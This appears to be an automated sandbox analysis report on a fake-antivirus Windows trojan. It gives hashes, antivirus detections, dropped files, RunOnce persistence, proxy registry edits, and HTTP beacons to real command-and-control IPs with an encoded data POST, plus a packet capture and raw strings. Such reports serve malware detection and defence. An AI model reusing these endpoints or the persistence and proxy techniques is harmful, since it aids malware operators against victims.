Analysis Date2015-09-08 12:34:03
MD5d10ada7598340f43cc105abd1aa82ecd
SHA16a95099b4309a5f10615128e78705847cf65a911

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e6c85f3a08096c6df33ee0db5895b4fb sha1: 44a187aab250e3252159e826ab118c79c6a1899f size: 188416
Section.rdata md5: 8b0fca2cc6d5939037f317828ba7f274 sha1: 888207b3e33c3292c847ee95e9620e3667a2385c size: 2048
Section.data md5: 9ae85e31ac234e41050b54e1bb9bd3b2 sha1: 8b0e2fdb214397694b48ff08f641f1eb5b5d0c94 size: 123392
Section.rsrc md5: 701268b5a62792ae9076c7ee8cb2df47 sha1: af5d582da7cdbd93102ed8e58bd815967880ba7f size: 5120
Timestamp1970-02-17 15:15:50
PEhashf712f2590eed4665a9e835c30fd0178ba41be592
IMPhashb3fb08000bf2c73a4d021514861a66a8
AVRisingTrojan.FakeAV!49B1
AVMcafeeGeneric FakeAlert.amb
AVAvira (antivir)TR/FakeAV.btxt.7
AVTwisterTrojan.680872042DDE022A
AVAd-AwareGen:Heur.Cridex.2
AVAlwil (avast)MalOb-FY [Cryp]
AVEset (nod32)Win32/Kryptik.MBU
AVGrisoft (avg)FakeAlert.AAS
AVSymantecTrojan.FakeAV!gen39
AVFortinetW32/FakeAlert.AMB!tr
AVBitDefenderGen:Heur.Cridex.2
AVK7Trojan ( 001e60c61 )
AVMicrosoft Security EssentialsRogue:Win32/Winwebsec
AVMicroWorld (escan)Gen:Heur.Cridex.2
AVMalwareBytesTrojan.Agent
AVAuthentiumW32/FakeAlert.LY.gen!Eldorado
AVFrisk (f-prot)W32/FakeAlert.LY.gen!Eldorado
AVIkarusTrojan.Win32.Pakes
AVEmsisoftGen:Heur.Cridex.2
AVZillya!Trojan.FakeAV.Win32.64024
AVKasperskyTrojan.Win32.FakeAV.cano
AVTrend MicroTROJ_FAKEAV.SMID
AVCAT (quickheal)FraudTool.Security
AVVirusBlokAda (vba32)SScope.Malware-Cryptor.Maxplus.0997
AVPadvishMalware.Trojan.FakeAV-7886
AVBullGuardGen:Heur.Cridex.2
AVArcabit (arcavir)Gen:Heur.Cridex.2
AVClamAVTrojan.FakeAV-7886
AVDr. WebTrojan.Fakealert.20556
AVF-SecureGen:Heur.Cridex.2
AVCA (E-Trust Ino)Win32/Diple.A!generic

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\6a95099b4309a5f10615128e78705847cf65a911
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\a246B.tmp
Creates FileC:\Documents and Settings\All Users\Application Data\eLdAbKmMmNe09000\eLdAbKmMmNe09000.exe
Deletes FileC:\6a95099b4309a5f10615128e78705847cf65a911
Creates Process"C:\Documents and Settings\All Users\Application Data\eLdAbKmMmNe09000\eLdAbKmMmNe09000.exe" "C:\malware.exe"
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\aDBD4.tmp"
Creates MutexDon't stop me! I need some money!

Process
↳ "C:\Documents and Settings\All Users\Application Data\eLdAbKmMmNe09000\eLdAbKmMmNe09000.exe" "C:\malware.exe"

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\eLdAbKmMmNe09000 ➝
C:\Documents and Settings\All Users\Application Data\eLdAbKmMmNe09000\eLdAbKmMmNe09000.exe\\x00
Creates FileC:\Documents and Settings\All Users\Application Data\eLdAbKmMmNe09000\eLdAbKmMmNe09000
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates MutexDon't stop me! I give work and money for you!
Winsock DNS69.50.195.77

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\aDBD4.tmp"

Network Details:

HTTP GEThttp://194.28.113.214/lurl.php?affid=09000
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP POSThttp://69.50.195.77/i.php?affid=09000&v=2
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
Flows TCP192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP192.168.1.1:1032 ➝ 69.50.195.77:80

Raw Pcap
0x00000000 (00000)   47455420 2f6c7572 6c2e7068 703f6166   GET /lurl.php?af
0x00000010 (00016)   6669643d 30393030 30204854 54502f31   fid=09000 HTTP/1
0x00000020 (00032)   2e310d0a 52656665 7265723a 20687474   .1..Referer: htt
0x00000030 (00048)   703a2f2f 3139342e 32382e31 31332e32   p://194.28.113.2
0x00000040 (00064)   31340d0a 41636365 70743a20 2a2f2f2a   14..Accept: *//*
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 372e303b   tible; MSIE 7.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20475442 302e303b 202e4e45 5420434c    GTB0.0; .NET CL
0x000000a0 (00160)   5220312e 312e3433 3232290d 0a486f73   R 1.1.4322)..Hos
0x000000b0 (00176)   743a2031 39342e32 382e3131 332e3231   t: 194.28.113.21
0x000000c0 (00192)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a                         he....

0x00000000 (00000)   504f5354 202f692e 7068703f 61666669   POST /i.php?affi
0x00000010 (00016)   643d3039 30303026 763d3220 48545450   d=09000&v=2 HTTP
0x00000020 (00032)   2f312e31 0d0a5265 66657265 723a2068   /1.1..Referer: h
0x00000030 (00048)   7474703a 2f2f3639 2e35302e 3139352e   ttp://69.50.195.
0x00000040 (00064)   37370d0a 41636365 70743a20 2a2f2f2a   77..Accept: *//*
0x00000050 (00080)   0d0a436f 6e74656e 742d5479 70653a20   ..Content-Type: 
0x00000060 (00096)   6170706c 69636174 696f6e2f 782d7777   application/x-ww
0x00000070 (00112)   772d666f 726d2d75 726c656e 636f6465   w-form-urlencode
0x00000080 (00128)   640d0a55 7365722d 4167656e 743a204d   d..User-Agent: M
0x00000090 (00144)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x000000a0 (00160)   61746962 6c653b20 4d534945 20372e30   atible; MSIE 7.0
0x000000b0 (00176)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x000000c0 (00192)   3b204754 42302e30 3b202e4e 45542043   ; GTB0.0; .NET C
0x000000d0 (00208)   4c522031 2e312e34 33323229 0d0a486f   LR 1.1.4322)..Ho
0x000000e0 (00224)   73743a20 36392e35 302e3139 352e3737   st: 69.50.195.77
0x000000f0 (00240)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000100 (00256)   3a203738 0d0a436f 6e6e6563 74696f6e   : 78..Connection
0x00000110 (00272)   3a204b65 65702d41 6c697665 0d0a4361   : Keep-Alive..Ca
0x00000120 (00288)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000130 (00304)   63616368 650d0a0d 0a646174 613d3331   cache....data=31
0x00000140 (00320)   41454138 34334232 44323039 45463245   AEA843B2D209EF2E
0x00000150 (00336)   32354536 36394441 42303638 33373444   25E669DAB068374D
0x00000160 (00352)   38343538 45304146 44354439 46383034   8458E0AFD5D9F804
0x00000170 (00368)   37314538 33373745 33423746 36383031   71E8377E3B7F6801
0x00000180 (00384)   30343126 763d32                       041&v=2


Strings
dd
a
.
.t
I
-
..
.
....
.
.
iF
.
{
.
.
`
1001
File
Main
MS Sans Serif
< >=/`
)\@ +_
]00uLCL
^~-03B
`040Ov
0~7l`J
0*p=Tu
@0U]:1L
0.yXoN
12et~j
16s.f'
~1FO<H
~1R01;+WH
1Z;ML S
2egbnzNL
2kW5MR
2LLES)n
*	2O\l
2q0N6in
3\=:%{
3]aMH*ah
3[-FHtL
3PIZd6
3PtLQM
3pV4AN
3t=/d*i
]3]vI~
3=WGUX
!$3"y}
3ypv|"
4	6Q>D
4n(7C&
4X-5rm?
56c_fl.
5GAPzA
5% g:u
5Hh>}}
5h/ rp
5LUum=t
5rmMrj
5XYO=!
5YTlc{!
.]~6=)
6A3Js5F
6Bq\]'
6e<Pa0
6{exj5
6j0enoeds
:6z^ !
7B#P8UB
7%e67`e
]?7hjo
)`7x7gokY
8Ag^)/
)8ayCo
8,bk"4
8*cjR5
8H4"$b
8i:`ma
8.}j<O]S
!8[ w/
<;94P7
96,\Z/
9AP 7s
*9FzC5I^
\(9\JGh"
)"9MF{
9|N>^p#C
9Uj<]HV
9XnFWyQOQ0%hB
9YH)<&
A2!BTiB
a2@<V=
a_)5n`
$Ab*w A
a{dguookeh
AdIh^a.
aD*SP;
aEf8#L
af.sqq$1
aic0=y
AjtyF.D
]#AMam
A]NLPu7
ao8H(:
aSL+ge
</assembly>
<assemblyIdentity
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
/`au	A
A([	[^(Z9
;{B2Tu
/b3g`I
(b5pT@q
BbJ0wN
.>bC1r
bdCK[nL_
BE BZw
bgH	.z
BhJ}dg
BitBlt
Bn}4(XoDx
~Brh6T|
BRi8[kY
BTjx-uY
bupT3&
_BVME5Q6
B`xd~yce
bxfzO9'"x
*b}~Z=>oG
C1v3NH
=.C5pfo
^ca:#I*<t
C<@Bws
:]cF5A
cG8tMM
+^cGux_
c{)h}\
CharLowerA
CloseHandle
.)Cq. 
 c)?QgW
CreateThread
&CViZ<a
c<%wn<
Cyoam\
CYP<ui
C<,z3	
C	ZJZt
d7^N_F
d7NN5^x*
~\=dAq
@.data
?D;cK7
de=iGK
DeleteCriticalSection
</dependency>
<dependency>
</dependentAssembly>
<dependentAssembly>
d^"Fls2
dhk9dL
DJ(VFkj
dM{jP	4
d?N@/EzJI(
d~)NgP>
d|[NIt
d<:s1|
{D)vdg
DvR=/oa
D/WrE.
DXcr[<m,EI
d@x}OG
DXP2f(
dZ'Ai~
dzkLl}x
e(;3r	q
E[.AmQR
>	Ec]~
E,CfG`n
ef64e}w
eGJ93I
?EjZr;
ek/Cqy
ElX{H^5
&e*N1z
EnumSystemLocalesA
e\odPP
E@/(TBcZ
etUmn]
ExitProcess
ExitThread
f2Iez70n38
F(|5^+
ffJph3
f~`{g :
fg4dzH
FIJ/w>a
F[lg>?
FlushFileBuffers
FlushInstructionCache
FqXQ3S-b5
F:QyL@c
FreeEnvironmentStringsA
FR:|N)
@FRO_slZ
'FtvQh
FvQ^p*
fxVLP#
%F%yAR$
 ^ {G{
)^g?^4].%
g48_	>
GBi/~D
G:b<?Y
gc816w?
GDI32.dll
GetBkColor
GetBkMode
GetCommandLineA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetFileType
GetFontData
GetKeyState
GetLastError
GetOEMCP
GetPixel
GetProcessHeap
GetProcessShutdownParameters
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetTimeZoneInformation
-Gh,,&
gN\BsH
gN	`iQ
gNJ"f*S
G$r!<<V
gWu%_u
;	=gzY
>h2>Ho:
H6<LKP
HeapAlloc
HeapCreate
HeapFree
|hFg0d
_:hiE^{$Au
hj!X/+
=!]_#Hn
H|[@U^$
h<uV\	
[hUyHq+
h Z@!-
HZ+s0W\
/	I1lv
i2mm|S
i6P41Q
ICmAly"
idgWi;
}]IEHu
IFcoh+u
!ig^l\
+i><]m
InterlockedDecrement
InterlockedExchange
{I`^Pk
IsValidLocale
j<(0_A
,J~1]"
j7->b6
JAo\!.T
Jd_dN+
>JH/5b2
J-:j^2w*
j(js.N\s
:~:jK@
j>.kS}
jMowfqg
JoNoUu7
Js7$w	
_j	>	[Y
jzifC(/v
';){k{
k1|UP&
k3('@8
}k3nK!Q)
k.5aMx$
K!a7J\
KE2<}iv
KERNEL32.dll
K^g [T
KHOpXAP
}.[.Kj
KKD7>C
KMBCm&
kML!ms
k{nidG
koZPlY
Kp2[x/Xd 
	;kv+Sy2
l1ee4N-
]l"2 m
@L7*:'
L+8u"dN
language="*"
LCMapStringA
LeaveCriticalSection
lm"VR'G
LocalAlloc
loFwpt
LuYw3[
/lWSMa
/Lx6IxL
lYGp0D
.(m4qlg
(m9vqt
M<ALkY
+mAw}0
Mf*lW}
Mh3MzAl<
MN>xH8|
Mo)Juo
mRwyzC
MSIMG32.dll
M	WHI	
MY|}InN
mz=?e~
m@[	Zx
n0D#%T
+=n1_a
]%N)<2*
N5899|
name="Microsoft.Windows.Common-Controls"
nb|9R%
NdvCuj-J
nf7i6H
n |?I^
NK.GrA3
N.L~G,
n  qBy
n%rj^Q
nsfef2Je
>nSgTO]yC ?
Nuxe*[
+{oaIc
oBOa9lB.!
^?OFr7:*,
O~h~B= 
ols,Yb
OpHFEy
oq6	aJkG^
oqkj?l
$ovH#e
ow|K1?
oxn,|n<
OZ1W-p
p	3z%I
:PClVa
+;pG)I_#
Pg^WDj->
{P>+,HN
PHTW(v5
P,hxz*
P*P5	a
processorArchitecture="*"/>
Ps`2HR
pSfzPCx)
[pSW>x
publicKeyToken="6595b64144ccf1df"
PV'b7d
_py	c8`
pyyo4j
qAU|X]
qj^ZZj
|q}m=|r
Qn!)jeV
QpqV=w
QpX*~1
&;.Qqa2B?
~qs5Ck
|Q^v/I
(qVj`G]Q
#QW"B8
Qy=b#1
qYFt1%e
r7D$Za
rB?H@c
`.rdata
Re>Z#f
RF>Y6[
_Rg$pk
RgrFq1
Rich$-
>rN4eQ
Rq9DFh
RtlUnwind
(R\=tN
R~xAfM
s1<xBIX
S5LA)e]/>k
][\{sA=
s*BhKu?
se^^+.F
SelectObject
SendMessageA
SetEndOfFile
SetEnvironmentVariableA
SetHandleCount
SetLastError
SetProcessShutdownParameters
SetStdHandle
SetTextCharacterExtra
[SK>/'
@s^WBy
s"x	mua
s<),yK
szV84W
t>1V7}
T7CS'vb
T<7P='
TC.?<I
}t\}dC#
tfwCFE
!This program cannot be run in DOS mode.
t::-J,
	`TMaSppRC
>T+`;N
Tpj{>-
Tqf`C1
TransparentBlt
t~TfvlR
Tu_e4}
type="win32"
U4x6Rs
UA,DQx
uaQgM>
`Uf.OKfXw
!uHm"F
UI$[9>
u,/ktr
U}PG}s
USER32.dll
Uv$[/)
vB(?WRA
version="6.0.0.0"
VGVGl5
VH3ZiA
VirtualAlloc
VirtualFree
VirtualQueryEx
vJM7hjwH=
V)l^g#u6hg?
vn_?h&
]vR\~}
VuMMt"
VY5?ztG
`vY9gQl
'v~Zkw
/w2o-6
?[W}6_w
	WaI	W
WaV=J"
wCI< ?
	WDw;p
w#frIZdX/
;w]GX!
	W;+h^
	W)l,l
Wl>;~s
wP`)AN
WriteConsoleA
,WR:LP
`+wR@tU
wVwJ`s*
#WWc^y
wZqT"$q
x0^NUW
xgIh(f
XH<{+82
xKjOoJ
xLA{:1
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
X]oP?{
-xryZ*
<&xW*[
xwCuY'
)y+~):
y6k*D="
y7i0+C
y>F*CKR
*yFpFv
YgG@}x
Y=I~g2
y`I@=T~2
Y_x_HBr
Y/yU>i
Y$;Z13
z.4Zl]G
/ZByF6F
z(cjNh^
zClB5'
":ZfaE
zN[|8V
(ZnL H
zS.cYn
Zt^b"P
{zYV+$